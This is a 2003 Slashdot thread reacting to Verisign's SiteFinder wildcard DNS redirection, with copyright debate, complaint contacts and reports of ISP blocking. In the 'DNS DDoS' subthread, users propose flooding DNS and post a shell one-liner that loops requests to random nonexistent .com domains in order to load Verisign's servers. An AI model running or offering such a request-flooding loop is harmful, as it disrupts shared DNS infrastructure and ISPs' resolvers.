Verisign Typosquatter Explorer

jelyon quotes Seth Finkelstein's website "I have written a program " Verisign Typosquatter Explorer" in order to examine [the Verisign] suggestions [for mistyped domains]. Future data may be analyzed as interest permits. Note tests with some domains seem to return results which are not constant, i.e. differences when the program is run repeatedly. This is not a program bug. Reloading the Verisign page also changes which squat-suggested domains are displayed. I don't believe it's an advertising rotation, but the behavior is similar to that practice."

With all the stuff flying in IT today

[grasshoppa]

it's amazing anybody is able to accomplish anything.

Anybody else feel like you just want to start over, with only good people involved, and remake the internet? None of this patent crap, none of this copyright bullshit, just pure standards that are actual standards. Uncompromised and pure. No restrictions on data, short of the physical line speeds.

Yeah yeah, I know..."when you wish, upon a star"

Re:With all the stuff flying in IT today

[keester]

Yeah, let's do it. We'll start with a biological attack on the whole planet ... wait ... who's that ... is that you, NSA? Oh shit!

Re:With all the stuff flying in IT today

[Osty]

Anybody else feel like you just want to start over, with only good people involved, and remake the internet? None of this patent crap, none of this copyright bullshit, just pure standards that are actual standards. Uncompromised and pure. No restrictions on data, short of the physical line speeds.

And you'd just have to do it all over again in 15-20 years, since that's exactly how the current net started.

Re:With all the stuff flying in IT today

[secolactico]

None of this patent crap, none of this copyright bullshit

Well, neither patents or copyright are properties of the Internet. How are you going to acomplish this? By using a disclaimer/eula? "By connecting to this network you agree to give up the rights of copyright/patents of anything that you post here". Or maybe disallowing patented or copyrighted works on the new net?

Re:With all the stuff flying in IT today

[grasshoppa]

Well, neither patents or copyright are properties of the Internet. How are you going to acomplish this? By using a disclaimer/eula? "By connecting to this network you agree to give up the rights of copyright/patents of anything that you post here". Or maybe disallowing patented or copyrighted works on the new net?

Perhaps a EULA barring any legal action being taken based on information viewed, or even better, it being a private network run by those that connect to it, based in some small carribean island where laws are things that happen to other countries.

Note that I call dibs on the network admin job on this, admittingly theoretical, dream island.

Re:With all the stuff flying in IT today

[saddino]

Anybody else feel like you just want to start over, with only good people involved, and remake the internet? None of this patent crap, none of this copyright bullshit, just pure standards that are actual standards. Uncompromised and pure. No restrictions on data, short of the physical line speeds.

Do away with the physical line speeds too and you've got Internet2...at least until it goes public one day.

Re:With all the stuff flying in IT today

[devphaeton]

Do away with the physical line speeds too and you've got Internet2...at least until it goes public one day.


Yeah.. 983 Megabits per second. You could have your computer online for approximately 7 minutes before your harddrive is completely packed with all the spam that would come in.

Re:With all the stuff flying in IT today

[mumblestheclown]

I'd like to start over and remake the internet. With people who RESPECT copyrights, for an atmosphere where intellectual work is treated equitably, so that we can build real empires of information, education, and entertainment, rather than play lowest common denominator games of today. I'd like an internet where a small software development shop can compete against large shops and make a fair profit without today's reality that any software that becomes popular gets pirated en masse, ultimately benefitting only the established names. I'd like a world where a musician can sell their songs for a fair price on the internet without middlemen knowing that their monetay success will be a linear product of the number of fans the quality of their music attracts. I'd like an internet without the "geektelligencia" going 180 degrees the wrong way and bitching and whining about copyrights, when they should be the first one to see their value and fight vigorously to protect them.

Re:With all the stuff flying in IT today

[EvilAlien]

Sounds like you've been reading your Ayn Rand.

Unfortunately, I doubt that Atlas is going to shrug any time soon, and the "good people" are going to be stuck with the "horribly stupid people" until we all blow ourselves up and the cats take over the planet.

I'm doing all I can to make sure our cats appreciate me so that I can (continue to) be a favored slave when it all goes down.

Re:With all the stuff flying in IT today

[grasshoppa]

Cats my ass, it's going to be the dogs that come out on top.

For referrence, I haven't read Ayn Rand, so I don't have a clue as to what you are speaking of

Re:With all the stuff flying in IT today

[rot26]

And you'd just have to do it all over again in 15-20 years, since that's exactly how the current net started.

Nah, it wouldn't be nearly as hard the second time around. It's like the project I worked on for a year... the day of the demo, I tripped and broke my computer, and by coincidence, all of my backups burned up in a fire because the network weenie was freebasing again. Anyway, I rewrote the whole thing in 7 minutes using nothing but Perl scripts and a bobby pin and it was ever better than before.

Mod it down, I have so much karma that it makes my nipples constantly hard... it's becoming embarassing.

Re:With all the stuff flying in IT today

[johnwroach]

Rand put forth (I'm not sure if she came up with it) a philosophy known as objectivism, according to which (I believe this is the main point) the actual creators and thinkers would benefit from their ideas, rather than the corporations they worked for, etc. It was supposed to be a pure form of capitalism.

Atlas shrugging was the dissapearence of all the creative people.

It's a good book, but understandably preachy.

Re:With all the stuff flying in IT today

[Spruce+Moose]

Congratulations on the first correct use of "your" vs "you're" in a troll.

Re:With all the stuff flying in IT today

[air+conditioned+ghos]

The future will be encrypted...and unfortunately it'll be really weak crypto that will offer no one any real protection for their personal information or enforce poorly worded intellectual property laws that only seem to protect large corporations.

Re:With all the stuff flying in IT today

[register_ax]

With people who RESPECT copyrights, for an atmosphere where intellectual work is treated equitably, so that we can build real empires of information, education, and entertainment, rather than play lowest common denominator games of today.

[begin normal homo sapien emotional response]
fsck that, seriously.
[allow adjustment for rational thinking]

Why respect copyright? Copyright was designed to give the creators exclusive rights to what is done with their material. This means they are gods of their own little universes, but people are infringing on their "rights" to this fact. I'm saying that we consider this our god-given right. Copyright is an attribute of a governing body. Yes, you are completely correct for copyright being a splendid idea for the US system and many other governing bodies around the world, however, please don't get caught up in the idea that this way will be the best for all eternity. So what I am saying is, don't consider copyright as an absolute sovereignty.

[The following paragraphs are not very coherent, proceed at your own risk. You have been warned.]

When you say "RESPECT copyrights," you're negating away from the root cause. People create the copyrights, right? We want to respect what people create, sure, but does that mean we respect the people? Well if you look at the current state of affairs, we don't really. We respect the law. We respect doctrines and paper. We respect copyright when there are rules governing us to do so. That's spiffy, but it's detracting us from something more fundamental.

It's obvious, respect people. Lemme esplain. With copyright we objectify. If we have no copyrights there is no restriction from impersonation, stealing ideas, and other bad things people can do with other person's things. There is also no restriction on creating derivative works and expanding on ideas which would otherwise (sometimes) lay stagnant. OK I know this sounds like stealing which is badBADBAD, but...

Imagine this, a world where people actually work together to get things done. Imagine the competitional greed (object = money = ideas = copyright/patent) in this world today. Right, a wonderful system if you adhere to certain rules. I'll risk destroying my argument by bringing up dee h4x0rs. They believe in a different stigma. Free access to all, right? Destroying a system will bring to light methods of improvement. So, manipulating someone's ideas allows for improvement on society as a whole. This is looking at the long term rather then the short.

As far as compensation goes for people, it will be in different forms (I'm not talking clams here). Others will grow around others and use ideas to progress their group as a whole. Note that the group might or might not be apparent. These could be researchers collaborating worldwide, or a few neighbors working on a project. Is it really worth it to withhold information that could contribute to the common good for the sake of self-gratification? Fsck your ego please so we don't have to live a life underground hiding from the robots. :)

I had better state that this is something that will be hard to make happen very soon (I mean within the next millenia (maybe it will be forced on us?)), but as I see it, inevitable. And you know what? I beg of you to alter and refine this information for publication in your next book. I hope very much you make millions of dollars from it too! :) How would you feel if you "stole" this from me and did it. You get conflicting messages, you might feel to compensate me, but I did give you permission. Aww...the perils of being human. :)

Summary
I'm not saying we should steal things, but that there should be nothing to steal.

* Profitable ideas are usually protected by a patent, but I lump it with copyright because copyright is a protection on artistic works (literary, musical, etc) and I see an elegant idea described on paper as artistic.

** Bits are free where things are "real"

Re:With all the stuff flying in IT today

[Knife_Edge]

Yeah, I was thinking along similar lines today. I want to remake the internet. Only this time, I want the users to be the ones who own and operate all the infrastructure - Everybody runs a node, and each person gets to decide what they will allow to be routed through their node. Don't like my decision? Nobody is forcing you to use my node, and this is unlicensed spectrum anyway. Heck, if you want access to my node (or to get access to my server on my node), you might even have to be someone I know, or be prepared to crack some much more serious encryption than WEP.

That's right, wireless is the answer. We'll start small, local networks, then gradually expand. I know there are problems with the tech, but we have to start somewhere.

I'll be busy connecting one building to the adjacent one on campus using a network that never touches the old internet and then repeating the process if you need me...

Re:With all the stuff flying in IT today

[CaptainTux]

Actually, this isn't as far fetched as you think it is. This line of thinking is exactly what drove the development of Internet2 and there is NOTHING stopping a bunch of creative technical people from getting together and developing it all from the ground up. Tux

Re:With all the stuff flying in IT today

[CaptainTux]

The only reason the current net is as unchecked as it is is because the original developers (DARPA) never envisioned it becoming what it is and didn't integrate checks and balances into it. Developing a "secondary internet" that would be less or non commercialized wouldn't be difficult. It would just require some planning and monitoring.

Re:With all the stuff flying in IT today

[Firewheels]

s/the internet/the world/

Re:With all the stuff flying in IT today

[nvlass]

We could just join freenet :) although it is not quite a new internet...

Re:With all the stuff flying in IT today

Yes, and I'd like an hour on the holodeck with Seven of Nine. /sarcasm

Re:With all the stuff flying in IT today

[Jennifer+E.+Elaan]

How about building an Internet as a sovereign nation? Then imposing these sorts of sanctions (copyrights, patents, etc) could be considered an act of war.

(and for the moderators: while I think the idea has at least an iota of merit, I *am* joking)

Re:With all the stuff flying in IT today

[Zeinfeld]

Unfortunately, I doubt that Atlas is going to shrug any time soon, and the "good people" are going to be stuck with the "horribly stupid people" until we all blow ourselves up and the cats take over the planet.

For Atlas to shrug the creative people have to be people as greedy and self centered as Ayn Rand was.

There are a few libertarians who are involved in the forefront of Internet and Web research but not very many and I doubt that their contribution is irreplaceable.

The Web is really a piece of performance art, it kind of looses its point if nobody experiences it.

Re:With all the stuff flying in IT today

[penguin7of9]

With people who RESPECT copyrights

What's there to "respect" about the Micky Mouse protection act?

I'd like an internet where a small software development shop can compete against large shops and make a fair profit without today's reality that any software that becomes popular gets pirated en masse, ultimately benefitting only the established names.

Small software development shops creating innovative products can profit today.

I'd like an internet without the "geektelligencia" going 180 degrees the wrong way and bitching and whining about copyrights, when they should be the first one to see their value and fight vigorously to protect them.

Maybe the "geektelligencia" knows that they can make a living without bizarre 70+ year restrictions on copying stuff. You, in contrast, just seem like just one of thoe incompetent whiners who thinks that because you can do half-assed VB programming, the world owes you a fat paycheck.

Re:With all the stuff flying in IT today

[hesiod]

> Developing a "secondary internet"

Which reminds me. Whatever happened to Internet 2? I haven't heard a thing about it in probably 2-3 years.

Re:With all the stuff flying in IT today

[DivideByZero]

Or maybe you could just join FidoNet, which tried to do the same thing back in the 80's -
Or maybe you could just set up a Packet Radio node.

But if you want to re-re-reinvent the wheel, who's to stop you?

Out-of-sync DBs?

[Lord+Grey]

The phenomena could be easily explained as out-of-sync databases. Assuming that Verisign is using multiple database systems, that is.

But does it matter? What Verisign is doing is wrong. Exactly how they're wrong is irrelevant.

It's not a bug...

[ArmedLemming]

"I don't believe it's an advertising rotation..."

It's a feature!

They need this suggestion

[doggkruse]

Everyone goto http://verisignneedstogetaclue.com

Re:They need this suggestion

[svallarian]

So I wonder if they used verisign to register the domain?

Steven V.

petition

Don't forget to sign the petition on Verisign's abuse of the DNS system.

Re:petition

[grub]

I would like to see just one online petition that has carried any weight. It's the height of "slacktivism".

Re:petition

[turg]

Yeah, and 99% of those signatures are probably fake. They are no better than than a Slashdot poll

The point is that it's an example of an online petition that had the intended effect (a majority vote in the senate to roll back an FCC policy decision)

Re:petition

[The+Matrix+Has+Me]

"Hey, company with no morals, here are thousands of email addresses of prople who don't like you."

The petition is addressed to ICANN, not Verisign. ICANN is in a position to order Versign to stop this practice.

Re:petition

[drakaan]

ANd most of those people who don't understand a DNS error in their web browser are using Internet explorer, which gives a similar search page. Verisign (not Verizon...god, why am I responding to an AC, anyway) doesn't own the .com and .net domains space, they just run the servers that give out name-server IP addresses for those domains.

They are taking advantage of the fact that they run those servers and are driving traffic to their site in a monopolistic and predatory manner while breaking many relied-upon services that expect a certain response (NXDOMAIN) when a domain doesn't exist. The site design is irrelevant, and what they have done is essentially hijack the .com and .net domains and squat on EVERY unregistered domain name out there.

Re:petition

[I8TheWorm]

It just did in the block of FCC's changes. I can't find it right now, but there's an image of Trent Lott and Tom Daschle from a couple of days ago speaking on the senate floor, with a huge stack of paper. It turns out that's a printout of the web petition signed by thousands of angry people.

Re:petition

[ChaosDiscord]

I would like to see just one online petition that has carried any weight. It's the height of "slacktivism".

Here you go. Apparently MoveOn.org's online petition was considered significant enough to warrant a press conference with two senators featuring boxes of printed out petitions.

HTH. HAND.

(All that said, I do agree that most online petitions are nearly worthless and don't carry anywhere near the weight of individually addressed messages. If you really care, take the time to express your position in your own words and send it as a letter (send an email in addition, if you like)).

Re:petition

[delta407]

If you really want to make sure Verisign hears you, try some of my suggestions from other posts, duplicated below.

A list of contact information is here. The Verisign main number is 1-877-438-8776, which gives you a long list of options. Depending on what you pick, you'll probably end up talking to a Network Solutions guy. Tell him you're distressed about the SiteFinder service, ask about what your options are, and ask if there's anyone else to talk to. They probably won't be much help, but write down everything they tell you, get their employee ID, and keep track of date/time for calls as well as time on hold (might be helpful).

After some lengthy conversation, I found out that I should be talking to the Verisign Global Registry, but that they can't give me a phone number, because (supposedly) NSI doesn't even have a phone number. However, I did get an e-mail address -- sitefinder@verisign-grs.com, which is routed to someone's inbox (as in, a person, not a support center), which currently yields an "Out-of-office reply" that gives out a cell phone number (!). I don't think I'm going to call it, but at least I have more contact information on file now and an e-mail that will get read.

Additionally, you might want to try calling the office of Russel Lewis, who's the VP of the Verisign directory services. He's at the Virginia office (1-703-742-0400), but I got disconnected instead of transferred and haven't called a second time (yet). If you try this number, you'll probably get a secretary, to whom you should explain that the standard procedures for communicating with Verisign have failed, that you are "very disappointed" and that you "want to make things right". (It works better if you're actually a Verisign customer.) If you're nice about it -- knowing that the secretary probably doesn't know anything about it and can't do anything anyway -- you can probably get routed to someone in the directory services division, where you can register further complaints.

[...]

I have been unable to raise the Chicago local office by phone, and when I went to visit, the visitor center couldn't even get a hold of them. Weird.

I called their headquarters in CA a few times now. I was hung up on, randomly transferred to someone's voice mail (I'm not sure who), and finally talked to a particularly helpful representative who passed my queries to his manager. They said that SiteFinder was run by NSI, to which I responded that NSI said that SiteFinder was run by Verisign, to which I added that Verisign (as a global registry) is the only organization with the power to do something like that. He went to talk to his manager, told me that they were promised more information on SiteFinder by the end of today (9/17), and promised me a call-back in 24 hours.

Updates to follow.

Re:petition

[the_mad_poster]

I e-mailed sitefinder@verisign-grs.com.

It looks like they've caught on and the e-mails are being routed to Customer Service. I got this auto-response:

Thank you for contacting VeriSign Customer Service. We have received your email and a member of our Customer Service team will be responding to you shortly.

Best Regards,

Customer Service
VeriSign, Inc.
www.verisign.com

Re:petition

[shokk]

That's right, it won't work. You have to vote with your feet, or in this case, your electronic feet. If you are in charge of a DNS server, push to have it updated to block their slimy wildcarding. So what if Verisign changes something to get around the latest patch? BIND and friends will update again. Who is more likely to get tired of this game faster, the suits who have to go out to a three hour lunch and don't want to hear about how crappy their latest decision was, or the out of work hacker with a terminal in his face and caffeine flowing to the tips of his coding fingers? I worry that this will lead to a fractured mess of DNS versions and someone will come along with a worm to take advantage of coding mistakes made in a hurry to counter each move. That could be a good thing in that it would force everyone to bump up to the latest Verisign blocking version.

Remember, it's a free market, so Verisign can do as they will within the limits of the law. They'll just have to deal with more work now to counter each move we make. Hey, on the bright side, it might mean more jobs for programmers and admins if they decide to continue with this. Good luck Verisign!

Re:petition

[Cunk]

So do you think those idiots actually printed up that petition? If they did then I'm going to start a petition to get them to stop wasting my money for their little press conferences.

It's gotta be just stacks of blank copier paper (maybe a few printed pages on top).

Re:petition

[delta407]

In that case, uou can e-mail Christopher Parente directly -- the guy that used to be associated with that address -- at CParente@verisign.com. But don't tell him I sent you. :-)

Re:petition

[MegaFur]

I would like to see just one online petition that has carried any weight. It's the height of "slacktivism".(emphasis mine)

Sweet. That's an excelent term. It's tempting to write a great, big essay bemoaning slacktivism, but I can't because I am a slacktivist.

Re:petition

[PReDiToR]

The recent online action taken against the European Patent shake up seems to have had an impact.

Re:petition

[GoRK]

No. MoveOn printed the petition and delivered it. You can't have a web petition if it just gets emailed as a link to congresspeople. They'll never see that.. But if you get 100K "signatures" on one and you show up at their door with a truck full of paper, they'll at least see it.

Re:petition

[Hognoxious]

That's an excelent term. It's tempting to write a great, big essay bemoaning slacktivism, but I can't because I am a slacktivist.

I like it too, but it has one major flaw - it's longer than "idle sod".

In case it gets slashdotted...

[skank]

Verisign Typosquatter Explorer
by Seth Finkelstein
Introduction

On Monday September 15 2003, a change to .com/.net behavior was announced. In sum, every mistyped domain name, one that had not been registered, would be redirected to a new site controlled by the company which runs a major part of the domain name system, Verisign.

When a URL has a misspelled domain name, Verisign's changes have the effect of redirecting every single HTTP page request (technically, HTTP response code 302). There is a redirection header and page which displays:

The document has moved here.

So, for example, the URL

http://verisign-is-to.net/more/evil/than/satan/h im self.html

Gets redirected to:

http://sitefinder.verisign.com/lpc?url=verisign- is -to.net/more/evil/than/satan/himself.html&host=ver isign-is-to.net

This site suggests corrections to the typo. I have written a program " Verisign Typosquatter Explorer" in order to examine these suggestions. Future data may be analyzed as interest permits.

Note tests with some domains seem to return results which are not constant, i.e. differences when the program is run repeatedly. This is not a program bug. Reloading the Verisign page also changes which squat-suggested domains are displayed. I don't believe it's an advertising rotation, but the behavior is similar to that practice.
Support

This project was not supported by anyone. If anyone is providing financial support for such projects, the author would dearly like to know.

Version 1.2 September 17 2003

See also: Domain Investigations
Mail comments to: Seth Finkelstein

For future information: subscribe to Seth Finkelstein's Infothought list or read the Infothought blog

See more of Seth Finkelstein 's Anticensorware Investigations

Mail addresses

[Ratface]

I mailed this little lot earlier today:

authenticode-support@verisign.com, billing@verisign.com, channel-partners@verisign.com, clientpki@verisign.com, consultingsolutions@verisign.com, dbms-support@verisign.com, dcpolicy@verisign.com, digitalbranding@verisign.com, dnssales@verisign.com, enterprise-pkisupport@verisign.com, enterprise-sslsupport@verisign.com, info@verisign-grs.com, internetsales@verisign.com, IR@verisign.com, jobs@verisign.com, mss@verisign.com, objectsigning-support@verisign.com, paymentsales@verisign.com, practices@verisign.com, premiersupport@networksolutions.com, press@verisign.com, privacy@networksolutions.com, renewal@verisign.com, support@verisign.com, verisales@verisign.com, vps-support@verisign.com, vts-csrgroup@verisign.com, vts-mktginfo@verisign.com, webhelp@verisign.com, websitesales@verisign.com, websitesupport@verisign.com

And I got a bunch of replies back, including *gasp* two written by actual human beings!

Remember folks, if you're going to write and complain, try and keep it civil. The porr bugger who hsa to read your complaint isn't the same person who actually took the decision to introduce sitefinder!

Re:Mail addresses

[gsiebrecht]

I got two replies from actual humans already today also. Keep the complaints going....

Re:Mail addresses

[happyfrogcow]

and then

s/verisign\.com/verizon\.com/ig

because they also suck, but in different ways

Re:Mail addresses

[AyeRoxor!]

Thank you for that list. I just sent the following message:

Subject:
New policy of typosquatting

Body:
To whom it concerns:

I am DEEPLY disturbed with your latest decision/practice to typosquat, and I hope you will reconsider. It is extremely arrogant to think that you, as a corporation, have a right to do this. Any page sent on request for a non-existing domain should represent ALL of that TLD's registrars or NONE. As it stands, this is equivalent to all wrong numbers dialed *anywhere in the world* getting a message from a Pennsylvania phone company. It's global hijacking, plain and simple, and I hope the backlash will teach you an obviously much-needed lesson.

Thank you for your time

Re:Mail addresses

[nomel]

Well, what did they say!? What did you ask? Come on man!

Advertising

[StewedSquirrel]

You don't think they have esoteric "we should HELP the Internet" type idea in mind, do you?

Advertising rotation... absolutely! They're after the ad revinue. These types of things should come as no shock.

Stewey

Re:Advertising

[HBI]

Esoteric should be altruistic.

At least how I read your intent.

Such a waste of time...

[winstarman]

So what do you do when you WANT to get a "domain cannot be found" error for troubleshooting purposes... I know it sounds weird, but this whole thing is very annoying.

R-

Re:Such a waste of time...

[Russ+Steffen]

I guess use a non-existant host in a real domain. That will still give you an NXDOMAIN response.

Re:Such a waste of time...

[JUSTONEMORELATTE]

use a .org
or a .uk, or any TLD except .com and .net

--

Re:Such a waste of time...

[crucini]

verisignsucks.com

Re:Such a waste of time...

[jaseuk]

.uk's are no better and unless your prepared to deal with nominet by snail mail/fax you are at the mercy of your isp.

Weird..

[grub]

If I make a type for "slashdot" such as salhsdtot.com it suggests goatse.cx as a top candidate. That's some pretty smart AI VeriSign has.

Re:Weird..

A clickable goatse.cx link gets modded up to 5? What is slashdot coming to?

Re:Weird..

[Nintendork]

Ummm, no it doesn't. I just clicked on that first link in your post. It has no suggestions.

-Lucas

Re:Weird..

[bziman]

No kidding... I searched for "fuck verisign and fuck the horse it screwed my dns with", and the first four results were from slashdot... bizarre.

no response

[bendawg]

I cannot get to 64.94.110.11.
Either it is not responding, or our network is blocking it.

Re:no response

[flipster23]

I have not been able to load that page on purpose either. It comes back as 64.94.110.11 for bogus names when I use dig, but Konqueror doesn't load a page. It says timeout on port 80. I've tried chaning browser ID tags to IE 5.5 for that IP, plus for the domain name it should give back. A friend of mine got it to load on Windows XP, but perhaps it has something to do with what OS you are using, even if you change browser tags?

Re:no response

[silentbozo]

I know at least of yesterday, UCLA was blocking that IP. Ruined a perfectly good demo to the guys at work about how evil Verisign is. :) However, (again, as of yesterday) UCLA was still passing wildcard DNS records in response to queries - we're just blocking access to the verisign site to generate a timeout, the bad DNS records ( with 64.94.110.11) are still coming through.

Re:no response

[drakaan]

I can't either, althought I could this morning...is Qwest your ISP? (I'm trying to find out if they are officially blocking the IP upstream).

Re:no response

[superpeach]

I dont seem to be able to get to it either, at least not port 80. Probably due to many slashdot readers running Seth Finkelstein's program to see what results they get :)

Re:no response

[Verteiron]

I haven't been able to reach it since yesterday evening sometime. I'm on through Mediacom, maybe they've blocked it?

Re:no response

[bendawg]

Responding to myself, to all who asked.
This is through two different ISP's.
One, through work, is AT&T.
The other, at home, is Time Warner Road Runner.

Re:no response

[bendawg]

I'm using IE 6 on Win2K and it isn't loading.

Mirror

[imadcow1]

Here is a mirror of the site in case it goes down: http://www.madcowworld.com/sethf.com/domains/veris quat/

where's the problem?

[erikdotla]

Hey, I'm outraged and mad too, like all of you.. but, I'm not seeing this. Maybe my ISPs have taken a stand with their DNS, but both my work and home ISPs? Unlikely. Why aren't I seeing this?

Re:where's the problem?

[Igmuth]

I dunno, lots of people have been mentioning the same things. I just think verisign massively underestimated the load on their servers and has been subject to a world wide slashdotting.

Serves them right.

Re:where's the problem?

[danielsfca2]

Yeah. according to the link in the submission (at NANOG), "Today VeriSign is adding a wildcard A record to the .com and .net zones. The wildcard record in the .net zone was activated from 10:45AM EDT to 13:30PM EDT. The wildcard record in the .com zone is being added now." as of 9/15. So this should mean this is going on at the moment. However, on Comcast, I've got normal behavior.

Re:where's the problem?

[JaredOfEuropa]

My ISP has; they've sent out an email stating their position.

Re:where's the problem?

[jeffasselin]

Same here at home, I get the normal timeouts, although DNS resolution for failed domains seems to take a bit longer, so I suspect my ISP has done something about it.

OTOH, at work Verisign's crap works, and we use our ISP's DNS servers, not our own, so not much I can do about it.

Re:where's the problem?

[gothicpoet]

It looks like a LOT of ISPs are taking action against Verisign.

Comcast appears to have blocked it. As I noted elsewhere, I cannot get the Sitefinder page to come up when I type in a bad domain name at home (Comcast) but at the same time systems at my office (TransEdge DSL) pull it up every time.

Comcast -- for once, god bless 'em.

Re:where's the problem?

[Phroggy]

For me, the DNS resolution works, but nmap says port 80 on that IP is filtered. So, somebody's firewalling it somewhere, apparently.

Re:where's the problem?

[Kris_J]

I'm seeing it. It'll start confusing the hell out of my staff any moment now. I've already got a request into our Linux guru to install the BIND patch when it comes out.

Re:Congratulations

[Seth+Finklestein]

I'll be back, motherfuckers.

I bet Michael Sims was DDOSing me.

He didn't attack capitalism

[kfg]

He supported freedom of speech.

If the two have come into such severe conflict perhaps something really has gone wrong with capitalism "as she is spoke."

There is a difference between capitalism and commercial anarchy. One of them follows rules of law. I'll give you two guesses which one.

KFG

Squating?

[toupsie]

How is this any different from me buying mispelled domains to profit off other company's trademarks? I know the Federal Government just tossed a guy in jail for doing the same thing. There is something that stinks to high heaven about this. It looks like they are abusing their right to manage the USA TLDs along with violating RFCs.

Re:Squating?

[flatt]

The only difference? Verisign just 'bought' ALL of them.

Re:Squating?

[slithytove]

The only difference I can think of is that Verisign didn't even have to buy the mispelled domains, which just makes it even more infuriating.
This is unquestionably an abuse of their "right" to manage the US TLDs and they should be stripped of it.
Personally I don't see why we couldnt have a distributed DNS system which would work something like freenet. The trademark office could push entries into the system, signed with their private key, and various other governmental, commercial and non-profit/private entities could push whatever entries they wanted onto the stack too.
It would be up to ISPs and individuals to pick which groups' entries to use and in what order.
Most people (and presumably all isps) would probably place the trademark offices' lists at the top so they could find the products and companies they seek (incidentally eliminating the problems associated with others registering your trademark as a domain).
A second tier of trustworthy companies would sell domain names (with market forces setting the cost based on how many isp's subscribe to their entries and how high up the search list most isp's place them)
Finally, I could make my own top-level domains by placing my own list near the top of every computers resolve.conf equivalent which I use.
No government-granted monopolies involved except the already existing trademark system and no need for an ultra-high-availability network at the top level.
If any of this strikes you as unfeasible you probably need to read more about freenet (or conceivably I do- let me know).

Re:Squating?

[e_AltF4]

>It looks like they are abusing their right to manage
>the USA TLDs along with violating RFCs.

Pardon me, but the USA TLD is .us and not .com or .net

Re:Squating?

[Phroggy]

How is this any different from me buying mispelled domains to profit off other company's trademarks?

One difference is, the domains Verisign is squatting on can still be registered like normal, through your registrar of choice.

Another difference is, Verisign didn't have to buy the domains, it just started using them without paying anything.

It looks like they are abusing their right to manage the USA TLDs along with violating RFCs.

As someone else pointed out, .com and .net are not USA TLDs, they're generic TLDs.

Verisign's BS

[BigDumbAnimal]

From the devguide:

A wildcard entry in a zone affects DNS responses for that zone. For existing applications that do not contemplate the effects of wildcard entries, application developers should consider taking appropriate corrective actions.

Thanks Verisign!

Re:Verisign's BS

[Nucleon500]

Not knowing much about how name resolution works from the client programming perspective, I ask, do such actions exist? IOW, is there any way to tell whether a domain is registered or wildcarded?

DNS DDoS

[Bob+Cat+-+NYMPHS]

If a large number of /.ers were to run a short script that tried to resolve random nonexistent domains, how long would it be before the root servers crashed?

Don't forget, YOU would not have done anything but asked your ISP's DNS for info. IT will be the one /.ing the root servers.

Not that I suggest you do this.

Re:DNS DDoS

[goranb]

I hope you actually planned for this to be funny... :) if not, consider this:
The problem with your approach is the fact that your ISP's DNS server will actually cache all the domains you are resolving... If inproperly configured, the memory consumption of such a cache will sky-rocket... If properly configured (to drop oldest entries when approaching a predefined memory consumption limit) performance will drop considerably, because most requests will have to be resolved as most of the cache is filled with bogus requests, and "real" requests get dropped very fast...
There is a real possibility that such action will affect your ISP's DNS cache more that it will have an influence on Verisign...

I don't like the situation we're in any more than the next guy, but please think all such actions through very carefully... ;)

Re:DNS DDoS

[Deagol]

I was doing this for a while. Then I realized I was using the public OpenNIC servers (which I didn't want to tax too much), so I quit. It works nicely, though:

while : ; do lynx --dump www.`ps -ef | md5sum | cut -c -32`.com > /dev/null; done

This should be pretty damned unique amongst everyone who uses it. Imagine when the logs fill up with sites like www.4799c5892e25189b9d8a83ee3752a303.com over and over again. Each request returns about 16KB of source HTML. Millions of these running might chew up some bandwidth and CPU time of their servers. :)

Re:DNS DDoS

[Bob+Cat+-+NYMPHS]

But that would be wrong!

Plus, there's no -f switch for ps under NetBSD. :)

Re:DNS DDoS

[Deagol]

Sorry. Should I have used "ps aux" for the BSD crowd? :)

20 lines of perl code makes a Slashdot story?

[Xerithane]

What is news worthy about this? This doesn't provide any statistics by itself. There is no wrapper scripts to actually match anything. All this does is parse the response page to display suggested hits. It's not even written that well.

It prints the suggested URLs out and then what? This isn't an explorer, it's a shitty data dump.

Besides, I thought Michael hated Seth. How did this story get posted?

Re:20 lines of perl code makes a Slashdot story?

[leviramsey]

Besides, I thought Michael hated Seth. How did this story get posted?

Taco posted it, not michael. Slashdot editors are not a borg-like entity.

Re:20 lines of perl code makes a Slashdot story?

To the original poster: This is exactly why you don't use your /. id wrt to seth or michael. They are both insane, and it is better to stay out of it.

If Seth pooped on your front porch, and you complained, he'd probably say that the poop was made by an EFF PIONEER AWARD WINNING CYBERSECURITY ACTIVIST. Then, he'd apparently shoot you first, and ask questions later.

Re:20 lines of perl code makes a Slashdot story?

[Xerithane]

Go ahead, list the awards.

Uhm, lets see here. I have a stable paycheck, and don't need to rely on people paying me for retarded scripts and other things.

That "shitty data dump" was published by an EFF PIONEER AWARD WINNING CYBERSECURITY ACTIVIST.

It still sucked. Sorry if this offends you. If I wrote a script that sucked, and someone said, "Wow, that sucked." than I would be in agreeance.

I wouldn't try to make myself seem overly pretentious and, well, idiotic.

You suck. (fires gun) I rule. (fires gun twice) Questions?

Yes, are you really 12 or do you just play that on Slashdot?

Re:20 lines of perl code makes a Slashdot story?

[Sneftel]

You know that isn't the real Seth, right? Check the spelling next time.

Re:20 lines of perl code makes a Slashdot story?

[JustAnotherReader]

20 lines of perl code makes a Slashdot story?

It depends on the code. Remember, the DeCSS code was only 7 lines of Perl. That had fairly far reaching effects on the rights of computer users.

Re:20 lines of perl code makes a Slashdot story?

[babbage]

FWIW, that's not how I remember it -- the original DeCSS was (I assume) a C program, and there was a trend of re-implementing it in different languages to keep it from being eradicated. The Perl example you cite was the shortest implementation, but I'm pretty sure it wasn't the original.

I can't find direct citations for this, but the "remove cascading stylesheets" DeCSS -- which came out as a protest to the original DeCSS decoder -- is talked about in this page, which is dated 16 Feb 2000. There's a reference to the 7 line Perl version from this article, dated 8 Mar 2001, and in this Wired article from Jun 2001.

This is enough to convince me that the original DeCSS wasn't as you describe here. I'm still not sure if it was Perl or not, but it wasn't the 7 liner that came out over a year later than the original.

Re:20 lines of perl code makes a Slashdot story?

[babbage]

FWIW, that's not how I remember it -- the original DeCSS was (I assume) a C program, and there was a trend of re-implementing it in different languages to keep it from being eradicated. The Perl example you cite was the shortest implementation, but I'm pretty sure it wasn't the original.

I can't find direct citations for this, but the "remove cascading stylesheets" DeCSS -- which came out as a protest to the original DeCSS decoder -- is talked about in this page, which is dated 16 Feb 2000. There's a reference to the 7 line Perl version from this article, dated 8 Mar 2001, and in this Wired article from Jun 2001.

This is enough to convince me that the original DeCSS wasn't as you describe here. I'm still not sure if it was Perl or not, but it wasn't the 7 liner that came out over a year later than the original.

----

REPOST: the original version of this comment had a broken anchor tag, which is corrected here. Feel free to mod the other version into oblivion...

On-line petitions don't work

[Eric+Ass+Raymond]

Indeed.

Petitions are pathetic per se, but e-mail/web petitions carry absolutely no weight at all.

